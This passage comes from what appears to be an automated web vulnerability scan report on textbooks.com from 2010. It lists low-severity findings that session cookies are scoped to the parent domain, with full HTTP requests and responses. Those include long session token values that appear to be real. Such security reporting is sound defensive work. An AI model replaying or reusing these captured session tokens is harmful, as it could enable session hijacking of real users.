YYhJiASnXk%2BS0kwSXJrDSj4Nv8rQQr16MWkmfSIcjzpjL1CjrginwZMsTumgzpxdiZYBq5wAE2b4cLPZpYiC79%2Bu6wP%2FeA2kyVMp4szfNJSU%2BdmlUDkMlmcZRoFr2RB%2FirehTIbzbQIx63ZEcd5H9f7qci6%2BaSZdMtC%2FqeyfJPuhX%2B7IVup3xo%2BE6PUemTJbna%2FTFbny3TjgF5qvC8%2Bidb0rEZpsOVk%2B0t1v6XQzM2TcZZkMMWYdKAPm0uwc1AXbiFgYyt6fPq94QFlszqdKbiZDgEhQSDCS3yj8%2FMpEJ9oPwuGNB2iVjLcoy1rZ8dUdotmAEKdKaAbdkZaGzxlsXQ3IktqqbUCP0IQ6oTKgOyBEBLu5xQkMnPVk2wkHK8Xby70hJqvibpCPowktXUetw0J3ZDx79NJv3SdJ3PYP7TZc6VLsIFf%2FyC4%2FXE5i7kiukEbLsC%2FHrjQz3dKX4qTBre7X8Jq8SfdwecfeCg30NiLMfxeh4kulrs8%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=jmetkS3kpyLzouadTgQ%3D; expires=Mon, 26-Dec-2011 13:51:58 GMT; path=/; domain=.textbooks.com
Content-Length: 38984


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.26. http://www.textbooks.com/sell-textbooks.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /sell-textbooks.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (domain=.textbooks.com rather than the issuing host www.textbooks.com): TBSESSION, TBPERSIST. The TBSESSION cookie appears to contain a session token, which may increase the risk associated with this issue, since every host under textbooks.com will receive it. You should review the contents of the cookies to determine their function.

Request

GET /sell-textbooks.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BBVC=deleted; expires=Sat, 26-Dec-2009 13:51:57 GMT
Set-Cookie: TBSESSION=RCVA2ltk80NW5Jf0Wl2Hp4znffWSrQPDUOtKIA0u%2FqlL%2FjYVd9r7rK57RoHO3klBemBEgmBjtjvqvzgYhIp7eeLgDA0I9MrFfURtlqwtx2BKN1IzFW4VuXlqki%2FIkLRfXjm71k0alz0rL9l4RKuXms1dz6YxpQlfct0kt2KO0nEqx9%2BJZwh8ydTHKfsSpN7asjXPWt9h1ZwYKBsJpAeil6JLAb91657JBthMgkmCg1dWpyOFt%2BO2%2F6IuWFiBvyfeDqld2XYdPmwncoE8r6H%2BiVS5foiEy7Obglt6qPLPrO8CnwOaGcTCUn9GIPasy266mXMSTxo0ZHFN5z7D%2FMi15PhmDLLLcVW9NDAa%2FZtn0z7Aic55u9ajBWXJje2dG5j%2Bwex47GhkRb8SCxa3h9eYD%2BFF8ODsBw8fKdAE9fJhe5sX%2BGSaDH%2BblHWcaDvOD%2BuAHHVC9867%2B8IVRD9A32ieqt2eWyCzXbPmyuAst2gKg8riGQ%2Bd0lFPTMmQkk%2FNvKgMcR5uxwUaiYK8OrTmO73yRrtAUjTDKt2fg5h2DMXa4g%2FUFbpL%2FBacwzt9qk6Qb4HbW2ALDFrKULxNGBQ0zGDrCy%2B0gRX%2ByS0XNKnGUzF%2FjsRLCRxSbeGmexVSotL%2FxQC7HJGtLp0EJGcsuyMXOTyFUuCvkxrHpaa8TjORbwlnxc33ZKOZYz9oh21tfBmWeSFFiQzRBMMMgGLgIMst99cK6FRxOPUF0Y9fQuKqJVCeEwCD8Ap6XRE0LwljO69yT6txlmkuUYSR5czrJH87PwlN%2B6EOzOJSQx05kVzChR8bdRUIacjCSLcxPeBAdFuHDsDAoOMGLxcRafAmk1RtanCiUFE6YO2rXCOjadz7bR%2FxELgt%2BLrYjgq8Nt%2FZ70rAyyE4Qbwm1XKfIy8i0YqG3jmQ6I6ZQyps%2FWburUYbt7DYRjkSxUE%2F%2BDleyB4Pv7WZEJ0v8z7v3lVDq0sfn%2BxvMZVWAfF1gee3wmf2nKxU87adO9iljyBUVtjb1%2BYSuwnjro4eSz0oeR4WFBqfyp%2BeHZmSIavq3Y00rvB6zoqcbqZ4i4eoe1gJc3vVBuz9n5gP4BMqLMl%2FEbWIywFxbZFNv1M8OlyfFZBbl9kpUzfdnC1HrJFyHp%2BM%2B9LbayuCXGHH4s8wF4ancGqr2XUICaF9IngzURcvFPuEULoLBBd4H%2FCqrbpoJdoSs5%2Fbn6H2UYrgjEbyataNxKwmptLaIAGUWe6CNKE68aVDc8TV88fKIkK0LJm8vRfrr4clbcysIn4%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=skRZMuAwUsugbpdzDo0%3D; expires=Mon, 26-Dec-2011 13:51:58 GMT; path=/; domain=.textbooks.com
Content-Length: 36639


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.27. https://www.textbooks.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (domain=.textbooks.com rather than the issuing host www.textbooks.com): TBSESSION, TBPERSIST. The TBSESSION cookie appears to contain a session token, which may increase the risk associated with this issue, since every host under textbooks.com will receive it. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=ZX8GKynTOuWErN2bcxdglGgKUSVXmfokmfizdb6fXTI%2BkR6D8IpmlJEj8xLbFZnS%2BJJGCtOuN%2FOKVTrOLZcOjsEyXvfO3m%2FWjiS3Tov2DxWx9fYSBrvdGp1zFD%2BnDX4xGxk1gggjoyAKhSzCtlGPUE6nWxB1csyqQN49pxfSslBvn6mLxmBpHtLY2qr5rtRu9tnlKVxOXq7%2FlHpIlh5xb4ra9riQLAee%2FazWSBVImIIDygqP7JOCyi6pFbzhv9vg%2FS0Sg3qb1xgVTopYw%2BaVBJ22tR1fBdfZmD7U44lVQInfrgOocBPveCj%2B7GY2C0J8oh%2BZVK9Xt1%2FzOM0DBLjPABq1sI%2BiMRhJJrfgsS3iPVywEwpg%2F78enCbB2lHrUmr%2F7Lw3c5pV7kLIP%2FEEHyAbsSI9qhrUO1aAYrSPF7TcIiKJy0v1aMpBnUxS6NEF1Jdlpe8SXxtioOeQSmm1MeCzJnTK%2BQgoHNyZe4GIRgmzWKiWy4JjMdtuR1KYjgTFXn4l0nrhzC0HPucbs8NP%2FksPlrq%2BEC%2BNotrXpkmBW8G9fryo6eUnfBOJFg6vKHxLPbPuJBECFWXyOdR%2BqXpZdJazoXunYU1UxyscQzPrneA5uvC%2FxLBEn2QwJJGlXdmVR1Q5cA7tNdCc%2Bcu1Me0cycGyudiSiiyCJEwVsXhU3jxSS7r%2B6zpbwHKFwdEUEZcoNJvwZuinnH020ZwqBqODaagXOsOoW9JBCcUrqSx7ZiFrd7O8xoDt7aBSXwyk7AcvSw%2BEZUJN3Vku51lf2Pv%2Fa7MKxWN4sYPWZbBw5KF4soeZ0%2Fvnq2lMMJYoGjUjvd%2BaDZeJSpTafw3qbOe%2FvQiTCkxkEySfXUllj8UI2b82MFZBC6nPV3te%2BOzRsT7D3bgZ3JULOFVZnYK3NNfmkQvW7w7PWd%2FcaqffTehBhIMhdPQcED7H7X5RO7M84QxIn0rnhyNsDWFMmJ1433jiBv4H71uqgQfEBtmMqu9dMOyXG4SkVJoia5HgtyWaejvNKkYBhsqc0DnJ0XPJ8GvSlToFgL3O2iMRulEwx%2FxUuCi0oX0gyMm%2FdUj4ASoSPZcLR7MGHdnmpCHYuxrIEcxmin75yo13LkVZCbZyNWHUWG6NBN15WVJgJ3COQlGxX8lBuInrftfMkqy4tGZ%2BHBZRrFGTm8ULKVJXPjqLOCqcc1gk3hk1KgDCsZEe4XIyBnLVY6zU62RlabQRw8iypVhzrzZDdHBPOTcaAuNXPPnO3Zj13u7ZCzzXPk1ipoRZtpBeOPU%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=b%2Bc21UkT1sQaFcBDQHk%3D; expires=Mon, 26-Dec-2011 13:51:33 GMT; path=/; domain=.textbooks.com
Content-Length: 35362


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.28. https://www.textbooks.com/account.php

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /account.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (domain=.textbooks.com rather than the issuing host www.textbooks.com): TBSESSION, TBPERSIST. The TBSESSION cookie appears to contain a session token, which may increase the risk associated with this issue, since every host under textbooks.com will receive it. You should review the contents of the cookies to determine their function.

Request

GET /account.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BBVC=deleted; expires=Sat, 26-Dec-2009 13:53:27 GMT
Set-Cookie: TBSESSION=HcVwmiPPLgvSivqJfoVmbt5gEZEgOp9Y6lox26AAXxDEjyif4Rkxly04sOZvg82jolcnT4y6M%2BzialsUEUiwtzC0zrDbjKsCRQsp6nd0%2BYtymVfLwc1Yl1g5o907kAXdJIgxb0amVLjTSzKlHgNQRwbvpNwW76WEWfJgBamgPBB1CyWrWBKzeeKIhhY343NcQGrHiNaXnjrKVHVu%2Bo1FGhpfdJaYnCAfOIJQWUtjeAhtQIj4quQwNpSvMYD1b8TmjOhnYOWRnvTXeqm5NHUK7qQq%2FjkS5iz60x3gyYSEBVIhshq7j7g4YM0YXpFUYZDYHOEpSIGyenfLHHsn02GIkFloCqa4AuzSEi8ZsCHgjI8mVN45YshZiUjIF7tAwShLwqZZ10UTxjftbLiTqUtgMOcN67A07SzT%2Bm0CKRleBxf9wiQQ%2FvyPtCYTJvei%2B5mqLbm991T4AxxBpJaEI%2BUgDwazAslsjkY4JIUy7YLGVJwu%2FBujjdU%2FTicgb%2Ff1z50%2Bpdn%2BLvuTlVyZfbbcaO6yutU55v6C1IJgRNCR%2FPIT0AqXdLBtKmafMSR%2BWspB3f1XB%2BauptSiRiRi93k1tJ2TwXiBPYKI%2BRJiptUrodZoDdGPwSkW63j4HAsLMpEEwfVov%2FvhWHHnjXic9UZVVGm7ulnspI3MlyxiuyEkDmJ1H8fhwSKQmtApkbumDH3pkz2D7kQSsglPowig%2FdlGUHoKTCNU573VqDUMoTeMAR7XhCZ6v4S4ViJnwVtKsv38xYZRzTijBe7xXX%2F4N0dVw7HgjK2xAYd2fNmOqn%2BX8H9BXQATUukdlq35nT%2FxoAVQqKcq046rXaTIcEraJgyGeFWZjugdBW%2BRPcqdZCrFw04L6LLv6r9TYvHwV%2Fg%2BlPBxSUjhQ1Wxu89rfRkRYFK036RbCcN%2B%2BDhOv%2Bnrvq6Lj2%2F8kO1AuI%2BMXWikfGbD4%2B03CwVPLlEHLKQI4cXZ9slTe%2Fzqvbh9Gd1Qurod%2FlXpNHZbgZ2U%2BM0pEnAmLIL93PWUT4ArNJHraqKPWK31tkUf1%2FDNmOW8xoEmwRBTC5GWmn9uiQVx5CT4QM8ecUE8hSiWxuveHAUMCzEDL9S7n6OlrWM856CqXGQKpQfittBjcx4mixKTRRV4yO8aLteM3jw3BpT45djSHDbibcFUVoM8ZzdrStw9PbT2JLjG6PlxHnjuXl7mNADGH6oIrppH1mDuh%2Bi0xp0uRXcgEgYyUFcHHmQlYllBMMLpj7A0AzPTtuvk7mCLB3xCiydJVPQZPGk%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=m2sT%2BeW4bxWwrRneS60%3D; expires=Mon, 26-Dec-2011 13:53:28 GMT; path=/; domain=.textbooks.com
Content-Length: 33655


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.29. https://www.textbooks.com/checkout.php

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /checkout.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (domain=.textbooks.com rather than the issuing host www.textbooks.com): TBSESSION, TBPERSIST. The TBSESSION cookie appears to contain a session token, which may increase the risk associated with this issue, since every host under textbooks.com will receive it. You should review the contents of the cookies to determine their function.

Request

GET /checkout.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:30 GMT
Content-Length: 24992
Connection: close
Set-Cookie: TBSESSION=GN%2Bu2RH0zu72InyE7yjEtHseOWko2s6C3Nnu%2Bel02ruAFXvxPxqzfstCuA9ufemgaVoW15o7ehfaiR3lXYev5Hl28gWQjGdp4r62cntl8Ppe%2BQB%2B%2F0PnTWSxzxnfeNqCXausL%2FDZQfxUHbZa9YobNMc8nhhywgxyfre46xwN%2FdJR8Nt8THau6QM%2FBcr5%2F541p6%2BsumwfXZERaEEcWeO7wcXn17Rv8%2FpFFZGks%2BIFbkjavKs9dmHpL7BrI2pt6sPQHd6b%2F2deduiP0eCPe1QyoIAGILwFRS1VriIsFzQzNIade%2BzmnH7SXXYtPwyEg9JZ4dcMkuab51A0Rbyy9BeTp%2FoQEc1rmertrtbWBb43SpmFMl1pXIEcwpTMwaOPsLcgAzKdCVWtHQM2y74Ilusj5dymYdWvCF0AFv72joZNh9xAOIj00moAbgiQvYm3YjgRybXPW9WGZyM%2BgfKSvc5swAJwYxW37jqjz99uCNVTm3zBmW39bUFF2gxAf3vZvMdxtqk5ozLzxiVXd0bxt4anKXczZx9bhqV9FBaehw5XylsCdUi3r%2Bvq1zaC5pHseIvr9%2BPEglegFQ%2B%2FcB%2Fdj5fO8ARg4iNt6%2FaYMgig5ah41Qu95hVCN7SsCNUFXdOlTgBfeobXgKKT0iSxNsimPxBfoTfpzMy%2Fby4BPcBbdT%2FfI1N3RhYOJLeAdCeujM8Zf2kK%2BQt5gzaEz7H0ARx%2FooJKRBqTMkKWw1Bbiu2usiUDsWDbH7mBiYYr5JoOUqU%2BgmlbkpdpH3IwQHihGE41zVNOEH44siHFWYUggG3CvTI3fDrDddZZgwv%2BaAdExM3QJScmaz2VVVGi7%2FXqU9OnyHVOusBLag9o5vRGT8SpjfoBv00CAehyb%2FnlDPlfmTR2ub2vbwjSxDFRz60oue41qDXfDZGyy8izPa293C2Uw98B2R7%2BxtYJBj895DBpW16w4bActPCnt2Fsxga7UPsKbwH5T5WruVPnmFOBV5GdnvIYNip%2Bt7kJhz1cg1pPGwRsVDHx5f4MMG70GQNe2HZGXDcb%2BPjlKHpSRYceIYzY1DbVka1dTaJ5HB7biPNlqni%2FRLgbvpxRYK4c4cUuwZw90NqaYAYBCZ2hXQBVYl%2FCi4xZnnjYBdK06nekOvzbvYBHOYXbbtnd4A1P0kMPaIJJEhLoeQBCR%2Bzb0%2Bs1d2Amp0nBVVDBvJEwSH6AeHJ2wNFvE%2BK9jjxqBBs0wqkLl%2F0OccXwsuWFBpSUUPPdJ4qm4Y8r%2FMp7FUkd6mjJblkV4kY%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=9vc8KFkiyfVkIilGB6Y%3D; expires=Mon, 26-Dec-2011 13:53:30 GMT; path=/; domain=.textbooks.com


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <meta name="ke
...[SNIP]...

4. Cookie without HttpOnly flag set
There are 29 instances of this issue:

Issue background

